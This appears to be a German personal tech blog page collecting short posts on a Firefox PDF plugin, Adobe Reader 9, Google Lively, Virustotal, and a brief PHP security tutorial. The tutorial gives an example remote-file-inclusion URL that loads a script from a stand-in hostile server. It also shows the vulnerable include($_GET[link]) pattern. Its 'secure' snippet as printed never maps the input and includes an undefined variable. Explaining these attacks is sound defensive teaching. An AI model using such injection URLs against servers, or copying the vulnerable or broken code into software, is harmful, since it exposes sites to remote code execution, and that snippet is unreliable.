Bei diesem Artikel bitte das Update beachten.

Das von nitro PDF Software entwickelte, kostenfreie Plugin für den Firefox ist nun in Version 2.0 erschienen, es erlaubt per Knopfdruck bequem HTML Seiten in ein PDF umzuwandeln.

Der Download bei Mozilla wurde bereits 8,6 Millionen mal benutzt.

[Update] Voller Euphorie habe ich diesen Eintrag geschrieben um jetzt nach dem Test festzustellen, dass das Plugin nicht selbst konvertiert, sondern nur auf eine Webseite umleitet die das Konvertieren dann übernimmt. Und das Umwandeln hat auf dieser Webseite dann noch nichteinmal funktioniert.

Allerdings bietet es eine andere nützliche und arbeitende Funktion:

Klickt man beim surfen auf einen Link der zu einem PDF Dokument zeigt, so kann man sich selbst entscheiden, ob man es innerhalb des Browsers oder in einem anderen Viewer außerhalb anzeigen möchte. Man kann es auch in ein HTML-Dokument umwandeln lassen (was wieder über die Umleitung auf eine andere Webseite funktioniert - also nichts für kritische Daten).

Aus dem letzten Grund behalte ich das Plugin vorerst. Allerdings würde ich zum Erstellen von PDF Dateien dann schon eher: PDF Creator empfehlen. Es gaugelt dem Computer einen Drucker vor. Man druckt also aus einer beliebigen Anwendung, so auch aus dem Browser auf diesem “PDF-Drucker” und erhält eine PDF-Datei statt einer Druckausgabe - ebenso schnell und einfach - aber sicherer.

Einige Personen sind der Meinung, dass PHP per se eine unsichere Programmiersprache ist. Wie kommt man darauf? Die Sprache kann IMHO nur insoweit etwas für Ihren Ruf, als dass sie es dem Programmierer erlaubt ziemlich einfach komplexe Operationen aneinanderzureihen, die im Zusammenspiel dann zum Sicherheitsloch werden.

Wie läuft eine PHP Code Injection grundsätzlich ab? Wie auf Glorf IT erwähnt gibt es jede Menge Angreifer, die versuchen durch automatische Spider das Web nach Sicherheitslöchern abzugrasen um diese anschließend auszunutzen. Nicht selten versuchen sie durch Übergabe einer Adresse in der URL z.B. http://www.alin.eu/?link=http://boeseseite/boesesscript.php ein boeses Skript auf meinem Server auszuführen. Solche Aufrufe findet man fast häufiger im Serverlog als richtige Seitenzugriffe von Besuchern.

Wenn man im PHP Code nun so etwas wie include($_GET[link]) stehen hat, was manche Content Management Systeme hin und wieder tatsächlich verwenden um Inhalt aus anderen Dateien einzubinden, wird der Schadcode vom fremden Server hereingeladen. Es kann beliebiger schädlicher PHP-Code ausgeführt werden.

Gegen solche Angriffe kann man sich noch relativ einfach schützen, indem man in der php.ini den Eintrag allow_url_fopen=On auf allow_url_fopen=Off setzt. Dann können keine Dateien mehr von anderen Servern aufgerufen werden. Nachteil: Auch alle anderen PHP Skripte können nicht mehr auf Dateien von anderen Servern zugreifen. Zudem kann der Angreifer immer noch Code ausführen, wenn er an anderer Stelle die Gelegenheit bekommt Dateien auf den Server abzulegen. Ein typischen Fall wie das funktioniert ist im Flashforum humorvoll erklärt.

Eine wie ich behaupte sichere Methode ist es, die Benutzereingaben nicht direkt zu verwenden, sondern sie zum Beispiel über ein assoziatives Array einer vorgegebenen Seite zuzuordnen.


$arraymap = array(
'index' => 'index.php',
'impressum' => 'impressum.php',
//usw
);

include($content);


Natürlich gibt es noch viele weitere Angriffsmöglichkeiten im Zusammenhang mit PHP. Auf nettuts.com wird eine kleine Übersicht gegeben.

Weitere Sicherheitslücken die nicht direkt etwas mit PHP zu tun haben, aber häufig in interaktiven Webumgebungen anzutreffen sind Cross-Site-Scripting (XSS) Lücken. (siehe Wikipedia)

Auch Wordpress Blogs sind immer mal wieder Opfer von solchen Angriffen. Wie man sein Wordpress Blog einigermaßen vor Angriffen schützt erfährt man bei brajeshwar.com (Englisch).

Ich erhebe mit dem Tutorial natürlich keinen Anspruch auf Vollständigkeit. Kommentare und Hinweise sind herzlich erwünscht.

Eine neue Idee von Google: Erstelle einen virtuellen Raum und stelle Ihn auf deine Webseite. Durch ein Plugin lässt sich dieser Raum betreten und sich dort mit anderen Besuchern der Webseite austauschen. Eine interessante Idee! Vielleicht auch ein neuer Hype?

Eine Vorschau und der Download findet sich hier:
http://www.lively.com/html/landing.html

Das Plugin ist für Firefox und Internet Explorer erhältlich und leider bisher nur auf Windows XP oder Vista lauffähig.

via golem.de

Nachdem der Firefox 3 mit großem Weltrekordspektakel mehr als 8 Millionen Downloads (Links zu Statistiken auf helmschrott.de) innerhalb der ersten 24 Stunden verzeichnete, veröffentlicht Adobe nun die neunte Version seines Adobe Readers.

Neben den Eigenschaften, dass diese Software auch in der Version 9 immer noch PDFs lesen kann gibts nun laut golem.de u. a. die Möglichkeit, dass mehrere Anwender auf verschiedenen PCs gleichzeitig ein PDF Dokument lesen können. Dabei wird bei jedem Benutzer die gleiche Seite angezeigt.

Zudem können PDF-Portfolios angezeigt werden. Ein neues Containerformat, in dem Video und Audio-Dateien usw. in einer PDF-Datei untergebracht werden können.

Wer braucht sowas? Top oder Flop? Ich werde das ca. 30 MB große Teil mal testen, denn Adobe verspricht, dass die Version 9 schneller laden soll als der Vorgänger.

Die Linuxer unter uns müssen sich aber ohnehin noch gedulden. Bisher ist nur die MacOS X und Windows Version erschienen.

Zum Download

[Update]
Ganze 160 MB freien Speicherplatz fordert die neue Version. Unter diesem Umständen muss mein PC auf die neueste Version erstmal verzichten.

Nichteinmal 1% aller Viren werden von allen gängigen Virenprogrammen erkannt. Was macht man, wenn man eine verdächtige Datei gefunden hat, der Virenscanner aber nicht Alarm schlägt?

Der von heise.de verwendete Webservice Virustotal testet die Datei einfach und zuverlässig mithilfe von über 30 Virenscannern - im Programm sind unter anderem Norton Antivirus, Bitdefender und Avira Antivir. Zudem gibt der Webservice einen guten Überblick welche Virenscanner den betreffenden Schädling erkannt hätten.

Wenn man den Uploader auf der Virustotal-Webseite herunterläd kann man als Windows Benutzer betreffende Dateien ganz einfach im Explorer per rechte Maustaste überprüfen lassen.

Der Dienst erwies mir erst kürzlich gute Dienste, als ich einen Virus vom Typ “Browser Hijacker” auf einen Laptop fand. Mithilfe von HijackThis und dem Online Dienst fand ich den Störenfried, der vom einfachen Virenscanner nicht erkannt wurde schließlich.